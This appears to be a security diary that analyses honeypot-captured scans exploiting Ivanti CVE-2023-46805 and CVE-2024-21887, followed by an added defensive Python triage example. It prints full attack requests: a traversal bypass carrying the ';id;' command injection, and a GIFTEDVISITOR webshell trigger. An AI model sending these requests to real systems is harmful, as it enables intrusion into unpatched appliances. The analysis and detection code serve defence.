Two currently (old) exploited Ivanti vulnerabilities

    Published: 2024-10-27. Last Updated: 2024-10-27 19:04:42 UTC
    by Johannes Ullrich (Version: 1)

    Ivanti products have given us a rich corpus of vulnerabilities in recent months (years). Of course, we do see occasional scans attempting to exploit them. Just today, I spotted two of them. Neither is particularly new, but they are a reminder to keep patching (or disabling):

    CVE-2023-46805 and CVE-2024-21887 "tests"

    POST /api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection HTTP/1.1
    Host: [honeypot IP address]:9001
    User-Agent: python-requests/2.32.3
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive
    Content-Length: 16
    Content-Type: application/json

    {"type": ";id;"}

    This is a very typical authentication or access control bypass taking advantage of a directory traversal vulnerability. The first part of the URL, "/api/v1/totp/user-backup-code/", is accessible to anybody because it may be used as part of the authentication process. That public prefix "masks" the second half of the path, which, once the "../../" segments are resolved, points to a restricted system maintenance endpoint. The JSON body, {"type": ";id;"}, carries the command injection half of the pair (CVE-2024-21887): once the traversal gets the request past the access check, the "id" command is what leaks the information. Always normalize your paths before applying access control rules.

    The purpose of this request is to detect whether your system is vulnerable. It will not cause any "damage" beyond leaking information if you are vulnerable. The more severe issue is that an actual exploit attempt will likely follow it.

    POST /api/v1/cav/client/visits HTTP/1.1
    Host: [honeypot IP address]:5986
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
    Connection: close
    Content-Length: 13
    Accept: */*
    Accept-Language: en
    Content-Type: text/xml
    Accept-Encoding: gzip

    GIFTEDVISITOR

    This is another exploit taking advantage of the two vulnerabilities mentioned above. The request attempts to trigger a webshell that Volexity calls "GIFTEDVISITOR", named after the string used to trigger it. Volexity wrote about this back in January [1]. It's sad that attackers still think it is worthwhile scanning for this.
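As an added example (not part of this diary and not Ivanti's code), the following Python applies the "normalize before you authorize" rule to the two captured requests above and triages them the way a honeypot or WAF log parser would. The public/restricted prefixes and the finding labels are assumptions chosen for illustration.

```python
"""Defender-side triage of captured requests for the two Ivanti probe patterns."""
import json
import posixpath
from urllib.parse import unquote

# Assumed access-control policy for this example: one pre-auth prefix, one restricted prefix.
PUBLIC_PREFIXES = ("/api/v1/totp/user-backup-code/",)
RESTRICTED_PREFIXES = ("/api/v1/system/",)
WEBSHELL_MARKER = "GIFTEDVISITOR"          # trigger string from the Volexity report
SHELL_METACHARS = set(";|&`$\n")           # enough to catch the ';id;' style payload


def normalize_path(raw_path):
    """Percent-decode, drop the query string, collapse '.' and '..' segments."""
    decoded = unquote(raw_path.split("?", 1)[0])
    normalized = posixpath.normpath(decoded)      # '/a/../../b' -> '/b', never above root
    if decoded.endswith("/") and not normalized.endswith("/"):
        normalized += "/"                         # keep a trailing slash for prefix rules
    return "/" + normalized.lstrip("/")


def naive_allows(raw_path):
    """The flawed check: prefix match on the raw path, before normalization."""
    return raw_path.startswith(PUBLIC_PREFIXES)


def normalized_allows(raw_path):
    """The correct check: normalize first, then apply the same prefix rules."""
    path = normalize_path(raw_path)
    return path.startswith(PUBLIC_PREFIXES) and not path.startswith(RESTRICTED_PREFIXES)


def classify(raw_path, body):
    """Return the finding labels (assumed names) that apply to one captured request."""
    findings = []
    if naive_allows(raw_path) and not normalized_allows(raw_path):
        findings.append("traversal-bypass")       # CVE-2023-46805 pattern
    try:
        type_field = json.loads(body).get("type", "")
    except (ValueError, AttributeError):          # not JSON, or not a JSON object
        type_field = ""
    if isinstance(type_field, str) and SHELL_METACHARS & set(type_field):
        findings.append("command-injection")      # CVE-2024-21887 pattern
    if body.strip() == WEBSHELL_MARKER:
        findings.append("webshell-trigger")       # GIFTEDVISITOR probe
    return findings


if __name__ == "__main__":
    # Constructed sample: the two request paths and bodies captured above.
    probe = "/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
    print(classify(probe, '{"type": ";id;"}'))
    print(classify("/api/v1/cav/client/visits", "GIFTEDVISITOR"))
```

Percent-encoded traversal (%2e%2e) is decoded before normalization, so the check catches it too; decoding after a prefix match would reopen the hole.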

    [1] https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

    ---
    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
